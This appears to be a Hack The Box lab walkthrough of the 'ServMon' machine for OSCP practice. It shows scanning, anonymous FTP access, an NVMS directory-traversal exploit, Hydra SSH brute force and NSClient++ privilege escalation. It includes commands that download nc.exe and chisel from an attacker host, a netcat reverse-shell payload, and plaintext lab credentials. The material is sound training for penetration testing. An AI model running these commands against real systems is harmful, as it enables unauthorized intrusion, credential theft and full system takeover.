In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
nmap scan
Nmap 7.94 scan initiated Wed Oct 25 07:09:12 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/servmon/results/10.10.10.184/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/servmon/results/10.10.10.184/scans/xml/_quick_tcp_nmap.xml 10.10.10.184
Nmap scan report for 10.10.10.184
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-25 07:09:13 EDT for 444s
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
22/tcp open ssh syn-ack OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLqFnd0LtYC3vPEYbWRZEOTBIpA++rGtx7C/R2/f2Nrro7eR3prZWUiZm0zoIEvjMl+ZFTe7UqziszU3tF8v8YeguZ5yGcWwkuJCCOROdiXt37INiwgFnRaiIGKg4hYzMcGrhQT/QVx53KZPNJHGuTl18yTlXFvQZjgPk1Bc/0JGw9C1Dx9abLs1zC03S4/sFepnECbfnTXzm28nNbd+VI3UUe5rjlnC4TrRLUMAtl8ybD2LA2919qGTT1HjUf8h73sGWdY9rrfMg4omua3ywkQOaoV/KWJZVQvChAYINM2D33wJJjngppp8aPgY/1RfVVXh/asAZJD49AhTU+1HSvBHO6K9/Bh6p0xWgVXhjuEd0KUyCwRqkvWAjxw5xrCCokjYcOEZ34fA+IkwPpK4oQE279/Y5p7niZyP4lFVl5cu0J9TfWUcavL44neyyNHNSJPOLSMHGgGs10GsfjqCdX0ggjhxc0RqWa9oZZtlVtsIV5WR6MyRsUPTV6N8NRDD8=
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA5iE0EIBy2ljOhQ42zqa843noU8K42IIHcRa9tFu5kUtlUcQ9CghqmRG7yrLjEBxJBMeZ3DRL3xEXH0K5rCRGY=
| 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN6c7yYxNJoV/1Lp8AQeOGoJrtQ6rgTitX0ksHDoKjhn
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack
5666/tcp open tcpwrapped syn-ack
6699/tcp open napster? syn-ack
8443/tcp open ssl/https-alt syn-ack
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after: 2021-01-13T13:24:20
| MD5: 1d03:0c40:5b7a:0f6d:d8c8:78e3:cba7:38b4
| SHA-1: 7083:bd82:b4b0:f9c0:cc9c:5019:2f9f:9291:4694:8334
| -----BEGIN CERTIFICATE-----
| MIICoTCCAYmgAwIBAgIBADANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDDAlsb2Nh
| bGhvc3QwHhcNMjAwMTE0MTMyNDIwWhcNMjEwMTEzMTMyNDIwWjAUMRIwEAYDVQQD
| DAlsb2NhbGhvc3QwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDXCoMi
| kUUWbCi0E1C/LfZFrm4UKCheesOFUAITOnrCvfkYmUR0o7v9wQ8yR5sQR8OIxfJN
| vOTE3C/YZjPE/XLFrLhBpb64X83rqzFRwX7bHVr+PZmHQR0qFRvrsWoQTKcjrElo
| R4WgF4AWkR8vQqsCADPuDGIsNb6PyXSru8/A/HJSt5ef8a3dcOCszlm2bP62qsa8
| XqumPHAKKwiu8k8N94qyXyVwOxbh1nPcATwede5z/KkpKBtpNfSFjrL+sLceQC5S
| wU8u06kPwgzrqTM4L8hyLbsgGcByOBeWLjPJOuR0L/a33yTL3lLFDx/RwGIln5s7
| BwX8AJUEl+6lRs1JAgMBAAEwDQYJKoZIhvcNAQEFBQADggEBAAjXGVBKBNUUVJ51
| b2f08SxINbWy4iDxomygRhT/auRNIypAT2muZ2//KBtUiUxaHZguCwUUzB/1jiED
| s/IDA6dWvImHWnOZGgIUsLo/242RsNgKUYYz8sxGeDKceh6F9RvyG3Sr0OyUrPHt
| sc2hPkgZ0jgf4igc6/3KLCffK5o85bLOQ4hCmJqI74aNenTMNnojk42NfBln2cvU
| vK13uXz0wU1PDgfyGrq8DL8A89zsmdW6QzBElnNKpqNdSj+5trHe7nYYM5m0rrAb
| H2nO4PdFbPGJpwRlH0BOm0kIY0az67VfOakdo1HiWXq5ZbhkRm27B2zO7/ZKfVIz
| XXrt6LA=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions, apple-iphoto, docker, hazelcast-http:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| iday
| :Saturday
| OfficeScan:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
| jobs
| metasploit-msgrpc:
| HTTP/1.1 403
| Content-Length: 20
|_ Your not allowed
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.94%T=SSL%I=9%D=10/25%Time=6538F794%P=x86_64-pc-linux-g
SF:nu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocatio
SF:n:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0\0\0\0:Saturday\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(HTTPOpti
SF:ons,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20no
SF:t\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent-Length
SF::\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x
SF:20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPO
SF:ptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x2
SF:0not\x20found")%r(OfficeScan,74,"HTTP/1\.1\x20302\r\nContent-Length:\x2
SF:00\r\nLocation:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0s\0e\0\0\0\0
SF:\0\0\0\0\0\x01\0\0\0\x01\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x0
SF:4jobs\x12\x02\x18\x02\x12\x0f")%r(apple-iphoto,36,"HTTP/1\.1\x20404\r\n
SF:Content-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(metasploit-ms
SF:grpc,70,"HTTP/1\.1\x20403\r\nContent-Length:\x2020\r\n\r\n403\x20Your\x
SF:20not\x20allowed\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(hazelcast
SF:-http,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20
SF:not\x20found")%r(docker,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r
SF:\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-10-25T11:16:21
|_ start_date: N/A
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 20065/tcp): CLEAN (Couldn't connect)
| Check 2 (port 52208/tcp): CLEAN (Couldn't connect)
| Check 3 (port 62863/udp): CLEAN (Failed to receive data)
| Check 4 (port 36627/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 25 07:16:37 2023 -- 1 IP address (1 host up) scanned in 445.25 seconds
We can log in to FTP anonymous
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49682|)
125 Data connection already open; Transfer starting.
02-28-22 07:35PM <DIR> Users
226 Transfer complete.
ftp> cd users
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49683|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM <DIR> Nadine
02-28-22 07:37PM <DIR> Nathan
226 Transfer complete.
ftp>
25 Data connection already open; Transfer starting.
02-28-22 07:36PM <DIR> Nadine
02-28-22 07:37PM <DIR> Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49684|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM 168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||49685|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************| 168 0.48 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (0.48 KiB/s)
ftp> cd ../
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49686|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM <DIR> Nadine
02-28-22 07:37PM <DIR> Nathan
226 Transfer complete.
ftp> cd Nathan
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49687|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM 182 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
229 Entering Extended Passive Mode (|||49688|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************| 182 0.52 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (0.52 KiB/s)
ftp>
we check out the two files
╭─kali@kali ~/HTB/servmon
╰─$ ls
Confidential.txt 'Notes to do.txt' results
╭─kali@kali ~/HTB/servmon
╰─$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine% ╭─kali@kali ~/HTB/servmon
╰─$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint% ╭─kali@kali ~/HTB/servmon
╰─$
After looking, found on searchsploit
Document not found% ╭─kali@kali ~/HTB/servmon/results/10.10.10.184/scans/tcp8443
╰─$ searchsploit Nvms
-------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Overflow | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
-------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
╭─kali@kali ~/HTB/servmon/results/10.10.10.184/scans/tcp8443
╰─$
Looking at the exploit, i found a python script on github –https://github.com/AleDiBen/NVMS1000-Exploit/blob/master/nvms.py
─kali@kali ~/HTB/servmon
╰─$ python nvms.py 10.10.10.184 Windows/win.ini win.ini
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content
++++++++++ BEGIN ++++++++++
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
++++++++++ END ++++++++++
╭─kali@kali ~/HTB/servmon
╰─$ python nvms.py 10.10.10.184 Users/Nathan/Desktop/password.txt password.txt
[-] Host not vulnerable!
╭─kali@kali ~/HTB/servmon
╰─$ python nvms.py 10.10.10.184 Users/Nathan/Desktop/passwords.txt passwords.txt
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content
++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++ END ++++++++++
╭─kali@kali ~/HTB/servmon
Saved the password to text file and used hydra with usernames Nathan,Nadine and Administrato
╭─kali@kali ~/HTB/servmon
╰─$ hydra -L user.txt -P password.txt 10.10.10.184 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-10-25 10:34:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21 login tries (l:3/p:7), ~2 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-10-25 10:34:30
╭─kali@kali ~/HTB/servmon
╰─$
logging in
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>
checking SMB
╭─kali@kali ~/HTB/servmon
╰─$ crackmapexec smb 10.10.10.184 -u Nadine -p L1k3B1gBut7s@W0rk --shares
SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 17763 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [+] ServMon\Nadine:L1k3B1gBut7s@W0rk
SMB 10.10.10.184 445 SERVMON [+] Enumerated shares
SMB 10.10.10.184 445 SERVMON Share Permissions Remark
SMB 10.10.10.184 445 SERVMON ----- ----------- ------
SMB 10.10.10.184 445 SERVMON ADMIN$ Remote Admin
SMB 10.10.10.184 445 SERVMON C$ Default share
SMB 10.10.10.184 445 SERVMON IPC$ READ Remote IPC
╭─kali@kali ~/HTB/servmon
╰─$
checked program files and saw NSclient ++ and changelog file in there
nadine@SERVMON C:\Program Files>cd NSClient++
nadine@SERVMON C:\Program Files\NSClient++>dir
Volume in drive C has no label.
Volume Serial Number is 20C1-47A1
Directory of C:\Program Files\NSClient++
Got a privesc script from guthub for NSClient –> https://github.com/xtizi/NSClient-0.5.2.35—Privilege-Escalation/blob/master/exploit.py
╭─kali@kali ~/HTB/servmon
╰─$ wget https://raw.githubusercontent.com/xtizi/NSClient-0.5.2.35---Privilege-Escalation/master/exploit.py
--2023-10-25 10:43:49-- https://raw.githubusercontent.com/xtizi/NSClient-0.5.2.35---Privilege-Escalation/master/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 911 [text/plain]
Saving to: ‘exploit.py’
exploit.py 100%[=======================================================================>] 911 --.-KB/s in 0s
2023-10-25 10:43:49 (29.4 MB/s) - ‘exploit.py’ saved [911/911]
╭─kali@kali ~/HTB/servmon
╰─$
Usage –>./exploit.py "C:\Temp\nc.exe 192.168.0.10 443 -e cmd.exe" https://192.168.0.100:443 supersecurepassword
copy nc.exe to the machine
nadine@SERVMON C:\>cd temp
nadine@SERVMON C:\temp>certutil -urlcache -f http://10.10.14.4:90/nc.exe c:\Temp\nc.exe
Access is denied.
nadine@SERVMON C:\temp>curl http://10.10.14.4:90/nc.exe -o nc.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 59392 100 59392 0 0 59392 0 0:00:01 0:00:01 --:--:-- 46950
nadine@SERVMON C:\temp>
I run it but keeps failing
╭─kali@kali ~/HTB/servmon
╰─$ ./exploit.py "C:\\Temp\\nc.exe 10.10.14.4 443 -e cmd.exe" https://10.10.10.184:8443 ew2x6SsGTxjRwXOT 1 ↵
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:1059: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.10.184'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
<Response [403]>
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:1059: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.10.184'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
<Response [403]>
╭─kali@kali ~/HTB/servmon
on checking the nsclient.ini we see it only accepts 127.0.0.1
╭─kali@kali ~/HTB/servmon
╰─$ ./exploit.py "C:\\Temp\\nc.exe 10.10.14.4 443 -e cmd.exe" https://10.10.10.184:8443 ew2x6SsGTxjRwXOT 1 ↵
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:1059: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.10.184'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
<Response [403]>
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:1059: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.10.184'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
<Response [403]>
╭─kali@kali ~/HTB/servmon
i checked and its to use port 8443 as default port
nadine@SERVMON C:\temp>netstat -an | findstr "8443"
ine@SERVMON C:\temp>netstat -ano | findstr 8443
TCP 0.0.0.0:8443 0.0.0.0:0 LISTENING 2272
nadine@SERVMON C:\temp>
we try chisel
copy to host
Invoke-WebRequest -Uri http://10.10.14.4:90/chisel_1.9.1_windows_amd64 -OutFile C:\temp\chisel_1.9.1_windows_amd64
chisel server
╭─kali@kali ~/HTB/servmon
╰─$ sudo ./chisel_1.9.1_linux_amd64 server -p 8000 --reverse 1 ↵
2023/10/25 22:15:55 server: Reverse tunnelling enabled
2023/10/25 22:15:55 server: Fingerprint cgk8e5cIJ4bIleLprY2TeHLNwlRDZ76/3m4gAI3UhxI=
2023/10/25 22:15:55 server: Listening on http://0.0.0.0:8000
chisel client
.\chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:8443:localhost:8443
0.0:0 LISTENING 2272
nadine@SERVMON C:\temp>.\chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:
8443:localhost:8443
2023/10/25 19:54:45 client: Connecting to ws://10.10.14.4:8000
2023/10/25 19:54:47 client: Connected (Latency 318.0378ms)
test the Portfowarding
0.0:0 LISTENING 2272
nadine@SERVMON C:\temp>.\chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:
8443:localhost:8443
2023/10/25 19:54:45 client: Connecting to ws://10.10.14.4:8000
2023/10/25 19:54:47 client: Connected (Latency 318.0378ms)
Try the exploit and listen on 443
╭─kali@kali ~/HTB/servmon
╰─$ sudo python ./exploit.py "C:\\Temp\\nc.exe 10.10.14.4 443 -e cmd.exe" https://10.10.14.4:8443 ew2x6SsGTxjRwXOT
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:1059: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.14.4'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
<Response [200]>
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:1059: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.14.4'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
we get admin
╭─kali@kali ~/HTB/servmon
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.184] 49731
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
C:\Program Files\NSClient++>